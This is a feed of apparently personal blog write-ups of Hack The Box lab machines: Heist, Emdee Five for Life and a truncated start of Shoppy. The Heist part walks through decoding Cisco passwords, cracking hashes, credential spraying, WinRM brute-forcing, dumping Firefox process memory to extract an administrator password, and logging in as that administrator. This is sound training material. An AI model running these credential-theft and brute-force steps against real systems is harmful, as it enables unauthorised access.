DEV Community: SSHad0w

Hack The Box Writeup: Heist

SSHad0w — Fri, 05 Jul 2024 13:59:00 +0000

This is a beginner friendly writeup of Heist on Hack The Box. hope you learn something, because I sure did! Be sure to comment if you have any questions!

Recon

/etc/hosts

In order to properly resolve our IP to a hostname, we'll need to map it's IP to a hostname using local DNS. This way, we won't need to type the IP address each time we'd like to communicate with the machine. In order to do this, we'll need to use the command sudo vi /etc/hosts, type in our password, and follow the convention within the file (IP address [TAB] domain name) to add it to the file on the next line.

Quick nmap

nmap 10.10.10.149 -p-
Nmap scan report for 10.10.10.149
Host is up (0.032s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
49669/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 161.65 seconds

Full nmap scan

My full nmap scan uses the following options:

nmap -sCV -p 80,135,445,5985,49669 -o heist.nmap heist.htb

-sV: Detects service versions
-sC: Runs safe scripts (using the NSE)
-p: Scans selected ports
-o: Outputs in normal format. (With filename "heist.nmap")

# Nmap 7.93 scan initiated Tue Jun 20 10:59:56 2023 as: nmap -sVC -p 80,135,445,5985,49669 -oN heist.nmap 10.10.10.149
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.031s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-title: Support Login Page
|_Requested resource was login.php
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-06-20T15:00:50
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_clock-skew: -2s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 20 11:01:31 2023 -- 1 IP address (1 host up) scanned in 95.02 seconds

Port 80

On HTTP, I see a login portal. The page is login.php, so we'll take note of the server side language.

Wappalyzer

Wappalyzer is a fantastic tool for easy investigation of back-end web technologies. It's a simple browser extension that can be installed on firefox.

Here's the output of the tool for this machine:

Let's click that "login as guest" button

/issues.php

We're met with a page called issues.php.

Keep in mind that we just learned 2 new usernames. User "Hazard" and user "Support admin". This may or may not be useful information later, but this is important in the enumeration process!

Let's have a look at that attachment:

/attachments/config.txt

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0Â mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

In the config file, there are usernames and hashed passwords.

Cisco type 7 passwords are vulnerable due to the a weak hashing algorithim.

To quote the documentation:

"The “Type 7” password encoding used Cisco IOS. This is not actually a true hash, but a reversible XOR Cipher encoding the plaintext password. Type 7 strings are (and were designed to be) plaintext equivalent; the goal was to protect from “over the shoulder” eavesdropping, and little else. They can be trivially decoded. "

Invalid creds

After inputting these credentials into the login page, we see that there isn't password reuse from the config file to the login page.

/errorpage.php

Cisco type 7 Password decryption

After reading the docs on the "hashing" algorithm, we could write our own code to do this, but there's a GitHub repo made for this.

python3 ciscot7.py -p 0242114B0E143F015F5D1E161713
Decrypted password: $uperP@ssword

python3 ciscot7.py -p 02375012182C1A1D751618034F36415408
Decrypted password: Q4)sJu\Y8qz*A3?d

Now that we have usernames and passwords, we can keep moving forward and try these whenever authentication is required.

MD5 cracking with hashcat

The other hash is MD5. We know how to crack an MD5 hash easily.

If you've never cracked MD5 hash before, go to my Previse HackTheBox writeup where we crack a few passwords very similar to this one, and I explain the anatomy of a password in more detail.

hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt

$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent

Credential spraying with crackmapexec

NOTE: The last time I rooted this machine, it was July 2023. At time of editing, (July 2024), CrackMapExec has been deprecated, and it's generally recommended to use NetExec (NXC). The syntax should be very similar, and it should get you through this portion of the writeup.

By this point, we've collected many credentials. Let's make a file of our usernames, and a file of collected passwords for some password spraying attacks.

Users.txt:

rout3r
admin
hazard
support_admin
support

pwds.txt:

$uperP@ssword
Q4)sJu\Y8qz*A3?d
stealth1agent

Since I use ParrotOS as my main distro, I had to install CrackMapExec, and I had lots of issues. If you're like me, don't download from GitHub or use apt, download CrackMapExec using the following command: pip3 install crackmapexec it will save you lots of time and dependency issues! It's even automatically adds it to /usr/bin, so you can call it from anywhere!

Now we'll run the following:

crackmapexec smb -u users.txt -p pwds.txt --shares heist.htb

crackmapexec smb -u users.txt -p pwds.txt --shares heist.htb
[*] Generating SSL certificate
SMB         heist.htb       445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         heist.htb       445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         heist.htb       445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         heist.htb       445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         heist.htb       445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         heist.htb       445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         heist.htb       445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         heist.htb       445    SUPPORTDESK      [-] SupportDesk\hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         heist.htb       445    SUPPORTDESK      [-] SupportDesk\hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         heist.htb       445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent 
SMB         heist.htb       445    SUPPORTDESK      [+] Enumerated shares
SMB         heist.htb       445    SUPPORTDESK      Share           Permissions     Remark
SMB         heist.htb       445    SUPPORTDESK      -----           -----------     ------
SMB         heist.htb       445    SUPPORTDESK      ADMIN$                          Remote Admin
SMB         heist.htb       445    SUPPORTDESK      C$                              Default share
SMB         heist.htb       445    SUPPORTDESK      IPC$            READ            Remote IPC

We've hit a match!

Now we've confirmed a few things:

1) Our target's hostname is named SupportDesk
2) The credentials hazard:stealth1agent are used at least once. This may be important for password reuse attacks later.

Since we only have read access, there's not much we can do for more access.

Impacket-lookupsid

LookUpSID allows us to look up the systemID of different users using

impacket-lookupsid "hazard:stealth1agent"@heist.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Brute forcing SIDs at heist.htb
[*] StringBinding ncacn_np:heist.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

Now, we can add these users to our username list.

RPC Client

According to tenfold-security.com, here's a little bit about SID's in windows:

SIDs always follow the same structure, with values separated by dashes:
S: The letter S indicates that this string is a SID.
1: The second position shows the revision level, i.e. the version of the SID specification. It has never been changed from 1.
5: The third position marks the identifier authority, which is typically 5 for NT Authority.
Domain or local computer identifier: This 48-bit string identifies the computer or domain that created the SID.
Relative ID (RID): The RID consists of four numbers and uniquely identifies a security principal in the local domain. RIDs not created by default by windows will have a value of 1000 or greater.

When you put it all together, an example of a SID could look like this:

S-1-5-43-4342332-4365423-981231-1015

You can read the full article here

The official documentation

rpcclient -U "hazard%stealth1agent" heist.htb

rpcclient $> lookupnames administrator
administrator S-1-5-21-4254423774-1266059056-3197185112-500 (User: 1)

As we see the RID for the admin account is 500. (This was just a test- the administrator account always has a RID of 500!)

rpcclient $> lookupnames guest
guest S-1-5-21-4254423774-1266059056-3197185112-501 (User: 1)

From there, we can continue to increment our requests to find new accounts:

pcclient $> lookupnames administrator
administrator S-1-5-21-4254423774-1266059056-3197185112-500 (User: 1)
rpcclient $> lookupnames guest
guest S-1-5-21-4254423774-1266059056-3197185112-501 (User: 1)
rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-502
S-1-5-21-4254423774-1266059056-3197185112-502 *unknown*\*unknown* (8)
rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-503
S-1-5-21-4254423774-1266059056-3197185112-503 SUPPORTDESK\DefaultAccount (1)

Since we have a username, we can look it up.

rpcclient $> lookupnames hazard
hazard S-1-5-21-4254423774-1266059056-3197185112-1008 (User: 1)

On windows systems, the first user typically has the SID of 1000, so now we know there are at least 9 users on this machine.

Let's try a manual bruteforce to find more accounts:

rpcclient $> lookupnames hazard
hazard S-1-5-21-4254423774-1266059056-3197185112-1008 (User: 1)
rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-1008
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1)
rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-1009
S-1-5-21-4254423774-1266059056-3197185112-1009 SUPPORTDESK\support (1)
rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-1010
S-1-5-21-4254423774-1266059056-3197185112-1010 *unknown*\*unknown* (8)
rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-1011
S-1-5-21-4254423774-1266059056-3197185112-1011 *unknown*\*unknown* (8)
rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-1012
S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (1)
rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-1013
S-1-5-21-4254423774-1266059056-3197185112-1013 SUPPORTDESK\Jason (1)
rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-1014
S-1-5-21-4254423774-1266059056-3197185112-1014 *unknown*\*unknown* (8)

Crackmapexec winrm

crackmapexec winrm 10.10.10.149 -u hazard -p stealth1agent
[*] Generating SSL certificate
SMB         10.10.10.149    5985   NONE             [*] None (name:10.10.10.149) (domain:None)
HTTP        10.10.10.149    5985   NONE             [*] http://10.10.10.149:5985/wsman
WINRM       10.10.10.149    5985   NONE             [-] None\hazard:stealth1agent

Tool I found to bruteforce logins

Avoiding msf with one simple trick! (Use bundle install)

https://github.com/y0k4i-1337/winrm-brute

bundle exec winrm-brute.rb -U ../users.txt -P ../pwds.txt heist.htb

Since this program requires the .bundle file to be used while running it, you'll need to execute it from inside the winrm-brute directory and reference a relative (or absolute) path to your username and password files!

Your output should look like this:

rying rout3r:stealth1agent
Trying admin:$uperP@ssword
Trying admin:Q4)sJu\Y8qz*A3?d
Trying admin:stealth1agent
Trying hazard:$uperP@ssword
Trying hazard:Q4)sJu\Y8qz*A3?d
Trying hazard:stealth1agent
Trying support_admin:$uperP@ssword
Trying support_admin:Q4)sJu\Y8qz*A3?d
Trying support_admin:stealth1agent
Trying support:$uperP@ssword
Trying support:Q4)sJu\Y8qz*A3?d
Trying support:stealth1agent
Trying chase:$uperP@ssword
Trying chase:Q4)sJu\Y8qz*A3?d
[SUCCESS] user: chase password: Q4)sJu\Y8qz*A3?d
Trying chase:stealth1agent
Trying jason:$uperP@ssword
Trying jason:Q4)sJu\Y8qz*A3?d
Trying jason:stealth1agent

We got a hit!

Now we can add this to our creds file.

chase:Q4)sJu\Y8qz*A3?d

Logging in with evil-winrm

Claim your shell with:

evil-winrm -i 10.10.10.149 -u "chase" -p "Q4)sJu\Y8qz*A3?d"

Install evil-winrm with the following: sudo gem install evil-winrm

The output should look like the following:

User flag:

Privesc

Todo.txt

Let's check out that todo.txt file:

Inspecting /issues.php

Now that we're on the box, we can look deeper into issues.php to see if there are any secrets.

If you're anything like me, you'll be kicked out of your shell multiple times!

So you can skip directly to where you need with:

evil-winrm -i <IP> -u "chase" -p "Q4)sJu\Y8qz*A3?d"

type issues.php

We find session information at the top:

/login.php

</body>
<?php
session_start();
if( isset($_REQUEST['login']) && !empty($_REQUEST['login_username']) && !empty($_REQUEST['login_password'])) {
        if( $_REQUEST['login_username'] === 'admin@support.htb' && hash( 'sha256', $_REQUEST['login_password']) === '91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040') {
                $_SESSION['admin'] = "valid";
                header('Location: issues.php');
        }
        else
                header('Location: errorpage.php');
}
else if( isset($_GET['guest']) ) {
        if( $_GET['guest'] === 'true' ) {
                $_SESSION['guest'] = "valid";
                header('Location: issues.php');

Dumping processes

Just like Linux, the ps command can dump the current processes in Windows.

*Evil-WinRM* PS C:\Users\Chase\Documents> ps                                    

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName           
-------  ------    -----      -----     ------     --  -- -----------           
    461      18     2228       5380               372   0 csrss                 
    291      13     2228       5100               484   1 csrss                 
    357      15     3448      14552              4868   1 ctfmon                
    250      14     3956      13388              3564   0 dllhost               
    166       9     1864       9728       0.03   6680   1 dllhost               
    615      32    30264      57692               976   1 dwm                   
   1483      57    23172      78420              1808   1 explorer              
    355      25    16528      39252       0.09   2692   1 firefox               
   1071      74   182336     258824       7.92   6320   1 firefox               
    347      19    10256      35700       0.22   6432   1 firefox
    401      35    49200     107168       2.78   6596   1 firefox
    378      29    29500      65904       0.80   6912   1 firefox
     49       6     1500       3868               772   0 fontdrvhost
     49       6     1800       4664               780   1 fontdrvhost
      0       0       56          8                 0   0 Idle
    964      22     5720      14440               624   0 lsass
    223      13     2944      10256              3896   0 msdtc
      0      12      268      15448                88   0 Registry
      ...

It seems like we've got Firefox running, we can inspect this further.

Proc dump

Proc dump is an official tool by Microsoft. You can download it here.

upload it using the full path like this:

*Evil-WinRM* PS C:\Users\Chase\Desktop> upload /home/sshad0w/Documents/ctf/htb/tracks/intro-to-dante/heist/procdump64.exe

Info: Uploading /home/sshad0w/Documents/ctf/htb/tracks/intro-to-dante/heist/procdump64.exe to C:\Users\Chase\Desktop\procdump64.exe

Data: 566472 bytes of 566472 bytes copied

Info: Upload successful!

To run a program in windows, we use the .\ notation.

.\procdump64

Since it's your first time running the program, you may run into a message like this:

So we'll have to run it with different arguments

.\procdump64.exe -accepteula -ma <PID>

Another issue that we may have is where we find the process in our list. If only we had some kind of way to grep for only Firefox processes....

Let's modify our ps command to only firefox processes.

ps | findstr firefox

Pick an ID, and run the command from earlier:

.\procdump64.exe -accepteula -ma 2692

*Don't forget that your PID may be different from mine!

Then we'll download it with

download firefox.exe_230623_015925.dmp

After it finishes, we can inspect it on our own machine.

Inspecting the dump file

Now that we've recovered the dump, we can switch our minds from pentesting to forensics. Our goal is to recover information from the dump file.

Just to verify the file type, we can run the file command.

In order to see if there are any strings in the file, we can run the "strings" command.

strings firefox

After running the command, I ran into an issue:

The file is huge. Even when I filter out human readable strings, it still gives me boatloads of information.

In order to cut this down, I'll grep for things like cookies, usernames, and passwords.

*I like to use tmux while I'm doing these, but the output was so long, I couldn't scroll through it all! For this reason I had to output it into separate files

strings firefox.exe_230623_015925.dmp | grep admin > dump_admin.txt

After lots of searching, I found the administrator's password by searching for the username admin.

Root

We can achieve the root flag by logging in directly with the new password.

evil-winrm -i 10.10.10.149 -u "administrator" -p '4dD!5}x/re8]FBuZ'

I'll be honest: I cracked this box a few years ago, but I'm making an effort to shift more towards more Windows related content, and I realized this blog would be a good start.

Please let me know in the comments if you have any questions, suggestions, or alternate paths!

Don't forget to always ask better questions!

Hack The Box Writeup: Emdee Five for Life

SSHad0w — Mon, 26 Jun 2023 16:35:28 +0000

Hello hackers! Today we'll cover a quick and fun scripting challenge using python. This is the first challenge on the Intro to Dante track on Hack The Box which is described as:
"Practice machines and challenges to help you prepare for the Dante Pro Lab."

Introduction

For this challenge, we're met with a website that presents us with a prompt and field. The field says "MD5" in it, suggesting that we're expected to submit the MD5 hash version of the text.

Methodology:

I looked up an MD5 hash generator website to complete the challenge. I inputted the string, copied the hash, and I was met with an unfavorable response:

The site changed the text provided and told me I was "Too slow!". Since I didn't appreciate it's teasing, I decided to boost my speed with a bespoke solution to this challenge.

Identifying the template

First, I need to see what a normal raw response looks like from this server, so I'm able to parse out the relevant data, hash it, and submit a response programmatically. For that reason, I don't think burp suite will help me here, as it won't give me a view of how it needs to be parsed. I think python will get the job done well.

Grabbing the response

I opened up the greatest editor of all time and wrote:

import requests
response = requests.get('http://134.209.176.83:30536') # change this for your instance!
print(response.content)

It's extremely simple, but it did the trick. Running this code gave me a response like the following:

b'<html>\n<head>\n<title>emdee five for life</title>\n</head>\n<body style="background-color:powderblue;">\n<h1 align=\'center\'>MD5 encrypt this string</h1><h3 align=\'center\'>c3WOTbjAmW4hFDHQpCjZ</h3><center><form action="" method="post">\n<input type="text" name="hash" placeholder="MD5" align=\'center\'></input>\n</br>\n<input type="submit" value="Submit"></input>\n</form></center>\n</body>\n</html>\n'

I ran it a few more times to make sure I had a good understanding of the format.

Great! Now all I need to do is pluck out the relevant information in the response.

Parsing the output

I tried parsing the output using classic python methods like .split(), but I ran into the following.

TypeError: byte indices must be integers or slices, not str

Turns out this was still raw bytes, instead of a proper string type.

The following update to my code fixed this issue:

import requests
response = requests.get('http://134.209.176.83:30536')
res = response.content

res = res.decode('utf-8')

print(res)

Now our output is a properly formatted string:

<html>
<head>
<title>emdee five for life</title>
</head>
<body style="background-color:powderblue;">
<h1 align='center'>MD5 encrypt this string</h1><h3 align='center'>pV0iSaxkboFU0E07UayP</h3><center><form action="" method="post">
<input type="text" name="hash" placeholder="MD5" align='center'></input>
</br>
<input type="submit" value="Submit"></input>
</form></center>
</body>
</html>

Grabbing specific output

Now it's time to shave our output down to only the text we need. We can use any parsing method, but I found This stack overflow answer to be most helpful.

import requests
response = requests.get('http://104.248.160.75:31480')
res = response.content

res = res.decode('utf-8')

mystr = res
search = "3 align='center'>"
start = mystr.index(search)+len(search)
stop = mystr.index("</h3>", start)
res = (mystr [ start : stop ])

print(res)

Now we have the raw "word."

Now let's hash it!

Hashing the word

According to stack overflow, we can use the following lines to make an MD5 hash of the word:

import hashlib
print(hashlib.md5(res.encode('utf-8')).hexdigest())

Using the following code should yield a valid MD5 hash:

import requests
import hashlib
response = requests.get('http://178.128.167.10:31790')
res = response.content

res = res.decode('utf-8')

mystr = res
search = "3 align='center'>"
start = mystr.index(search)+len(search)
stop = mystr.index("</h3>", start)
res = (mystr [ start : stop ])

print(res)

print("MD5 version:")

print(hashlib.md5(res.encode('utf-8')).hexdigest())

Output should look something like this:

fJHiQK1isKuPYxbEulUH
MD5 version:
80ed60f85b4fbbc982b5816912b1ba6a

Don't forget! We can always verify the validity with an online tool:

That looks correct! now, we can focus on sending the hashed message back to the server!

Sending the hash

In the original response, we saw that the HTML field name was called "hash" so we'll use that field name to submit our response. After a bit of reading, the syntax became extremely straightforward for the requests library. We just need a dictionary to hold our data and submit our response. With that added, our code now looks like the following:

import requests
import hashlib
# Grabbing and decoding
url = 'http://178.128.167.10:31790'
response = requests.get(url) 
res = response.content
res = res.decode('utf-8')
# Parsing out the word
mystr = res
search = "3 align='center'>"
start = mystr.index(search)+len(search)
stop = mystr.index("</h3>", start)
res = (mystr [ start : stop ])
print(res)

# Hashing as MD5
print("MD5 version:")
hash = (hashlib.md5(res.encode('utf-8')).hexdigest())
print(hash)

# Sending the hash
payload = {"hash":hash}
response = requests.post(url, data=payload)
res = response.content
flag = res.decode('utf-8')
print("\n\n" + flag)

Everything looks ready to use, so let's run it!

Output:

Our flag... Or not?

LSByV3cfj4CH7ufR5G2a
MD5 version:
46b323c4923e460759346454210adb8f


<html>
<head>
<title>emdee five for life</title>
</head>
<body style="background-color:powderblue;">
<h1 align='center'>MD5 encrypt this string</h1><h3 align='center'>OLWB7P9EqGd03jHmmXRN</h3><p align='center'>Too slow!</p><center><form action="" method="post">
<input type="text" name="hash" placeholder="MD5" align='center'></input>
</br>
<input type="submit" value="Submit"></input>
</form></center>
</body>
</html>

It seems we're too slow.

I thought we'd be fast enough, but maybe our code was too inefficient. We'll have to find a way to speed it up, but first we'll need to find out how fast we currently are!

Clocking our code

Let's see how fast our code is running.

We can use the time command to clock it

time python3 payload.py yields us:

real    0m0.690s
user    0m0.173s
sys 0m0.017s

Why it didn't work:

After reading a blog post about this challenge, I found out why this wouldn't work properly:

Knowing this, I rewrote my code to use a single coherent session rather than sending random disjointed requests.

Our code now looks like this:

import requests
import hashlib
# Grabbing and decoding
url = 'http://161.35.166.224:32511'
session = requests.session()
response = session.get(url) 
res = response.content
res = res.decode('utf-8')
# Parsing out the word
mystr = res
search = "3 align='center'>"
start = mystr.index(search)+len(search)
stop = mystr.index("</h3>", start)
res = (mystr [ start : stop ])
print(res)

# Hashing as MD5
print("MD5 version:")
hash = (hashlib.md5(res.encode('utf-8')).hexdigest())
print(hash)


# Sending the hash
payload = {"hash":hash}
response = session.post(url, data=payload)
res = response.content
flag = res.decode('utf-8')
print("\n\n" + flag)

Only a few small changes, but it made a huge difference!

Output:

C7RrJ4GN4f2tMK51Z8JZ
MD5 version:
d185f72466f92c697b6c9ed3ca496ebe


<html>
<head>
<title>emdee five for life</title>
</head>
<body style="background-color:powderblue;">
<h1 align='center'>MD5 encrypt this string</h1><h3 align='center'>C7RrJ4GN4f2tMK51Z8JZ</h3><p align='center'>HTB{N1c3_ScrIpt1nG_B0i!}</p><center><form action="" method="post">
<input type="text" name="hash" placeholder="MD5" align='center'></input>
</br>
<input type="submit" value="Submit"></input>
</form></center>
</body>
</html>

Lessons learned

It's times like this that remind me that it's okay to use writeups, even the best people in the field do it to learn!. If I hadn't have stopped and read a writeup, I wouldn't have understood why I needed to use requests.session(), and I wouldn't have been able to progress. It's easy to get frustrated while learning new things, but there's no point in staying frustrated if you're stuck.

Thanks for reading! Be sure to come back to read my writeup on "Heist"!

Hack The Box Writeup: Shoppy

SSHad0w — Mon, 27 Mar 2023 19:55:13 +0000

This is a beginner friendly writeup of Shoppy on Hack The Box. I hope you learn something, because I sure did! Be sure to comment if you have any questions!

Adding the domain to `/etc/hosts`

Make sure that your IP matches up with the instance HTB gave you! Don't copy mine!

Recon

Nmap

For speed purposes, I use a very quick nmap scan to grab all of the open ports on the machine (and nothing more). The -p- flag is great for this. Without -p-, I'd only scan for the most common 1000 ports instead of all 65,535 TCP ports. This can be a fatal mistake in the enumeration phase.

Here's the command we'll use:

nmap -p- shoppy.htb

Quick Nmap output

Nmap scan report for shoppy.htb (10.10.11.180)
Host is up (0.031s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9093/tcp open  copycat

Nmap done: 1 IP address (1 host up) scanned in 280.71 seconds

Note that these ports are all TCP only! If we wanted to scan UDP we'd use the -sU option.

Now that we have identified the ports available we know that the ports available are 22, 80, and 9093. With this information, we can infer that there's a webserver, and an SSH client running on this machine. However, there's another port that I don't recognize. Let's look into all of them, but keep an eye on our out of place port.

Full nmap

My full nmap scan uses the following options:

nmap -sCV -p 22,80,9093 -o shoppy.nmap shoppy.htb

-sV: Detects service versions
-sC: Runs safe scripts (using the NSE)
-p: Scans selected ports
-o: Outputs in normal format. (With filename "shoppy.nmap")

# Nmap 7.92 scan initiated Wed Dec 14 19:10:22 2022 as: nmap -sCV -p 22,80,9093 -o shoppy.nmap shoppy.htb
Nmap scan report for shoppy.htb (10.10.11.180)
Host is up (0.093s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
|   256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_  256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp   open  http     n17/12/2022 16:08ginx 1.23.1
|_http-server-header: nginx/1.23.1
|_http-title:             Shoppy Wait Page        
9093/tcp open  copycat?
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: text/plain; version=0.0.4; charset=utf-8
|     Date: Thu, 15 Dec 2022 00:10:27 GMT
|     HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
|     TYPE go_gc_cycles_automatic_gc_cycles_total counter
|     go_gc_cycles_automatic_gc_cycles_total 11
|     HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
|     TYPE go_gc_cycles_forced_gc_cycles_total counter
|     go_gc_cycles_forced_gc_cycles_total 0
|     HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
|     TYPE go_gc_cycles_total_gc_cycles_total counter
|     go_gc_cycles_total_gc_cycles_total 11
|     HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
|     TYPE go_gc_duration_seconds summary
|     go_gc_duration_seconds{quantile="0"} 2.8354e-05
|     go_gc_duration_seconds{quantile="0.25"} 9.8767e-05
|_    go_gc_d
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9093-TCP:V=7.92%I=7%D=12/14%Time=639A65FF%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
SF:x20Request")%r(GetRequest,2A82,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:
SF:\x20text/plain;\x20version=0\.0\.4;\x20charset=utf-8\r\nDate:\x20Thu,\x
SF:2015\x20Dec\x202022\x2000:10:27\x20GMT\r\n\r\n#\x20HELP\x20go_gc_cycles
SF:_automatic_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycles\
SF:x20generated\x20by\x20the\x20Go\x20runtime\.\n#\x20TYPE\x20go_gc_cycles
SF:_automatic_gc_cycles_total\x20counter\ngo_gc_cycles_automatic_gc_cycles
SF:_total\x2011\n#\x20HELP\x20go_gc_cycles_forced_gc_cycles_total\x20Count
SF:\x20of\x20completed\x20GC\x20cycles\x20forced\x20by\x20the\x20applicati
SF:on\.\n#\x20TYPE\x20go_gc_cycles_forced_gc_cycles_total\x20counter\ngo_g
SF:c_cycles_forced_gc_cycles_total\x200\n#\x20HELP\x20go_gc_cycles_total_g
SF:c_cycles_total\x20Count\x20of\x20all\x20completed\x20GC\x20cycles\.\n#\
SF:x20TYPE\x20go_gc_cycles_total_gc_cycles_total\x20counter\ngo_gc_cycles_
SF:total_gc_cycles_total\x2011\n#\x20HELP\x20go_gc_duration_seconds\x20A\x
SF:20summary\x20of\x20the\x20pause\x20duration\x20of\x20garbage\x20collect
SF:ion\x20cycles\.\n#\x20TYPE\x20go_gc_duration_seconds\x20summary\ngo_gc_
SF:duration_seconds{quantile=\"0\"}\x202\.8354e-05\ngo_gc_duration_seconds
SF:{quantile=\"0\.25\"}\x209\.8767e-05\ngo_gc_d")%r(HTTPOptions,2A82,"HTTP
SF:/1\.0\x20200\x20OK\r\nContent-Type:\x20text/plain;\x20version=0\.0\.4;\
SF:x20charset=utf-8\r\nDate:\x20Thu,\x2015\x20Dec\x202022\x2000:10:27\x20G
SF:MT\r\n\r\n#\x20HELP\x20go_gc_cycles_automatic_gc_cycles_total\x20Count\
SF:x20of\x20completed\x20GC\x20cycles\x20generated\x20by\x20the\x20Go\x20r
SF:untime\.\n#\x20TYPE\x20go_gc_cycles_automatic_gc_cycles_total\x20counte
SF:r\ngo_gc_cycles_automatic_gc_cycles_total\x2011\n#\x20HELP\x20go_gc_cyc
SF:les_forced_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycles\
SF:x20forced\x20by\x20the\x20application\.\n#\x20TYPE\x20go_gc_cycles_forc
SF:ed_gc_cycles_total\x20counter\ngo_gc_cycles_forced_gc_cycles_total\x200
SF:\n#\x20HELP\x20go_gc_cycles_total_gc_cycles_total\x20Count\x20of\x20all
SF:\x20completed\x20GC\x20cycles\.\n#\x20TYPE\x20go_gc_cycles_total_gc_cyc
SF:les_total\x20counter\ngo_gc_cycles_total_gc_cycles_total\x2011\n#\x20HE
SF:LP\x20go_gc_duration_seconds\x20A\x20summary\x20of\x20the\x20pause\x20d
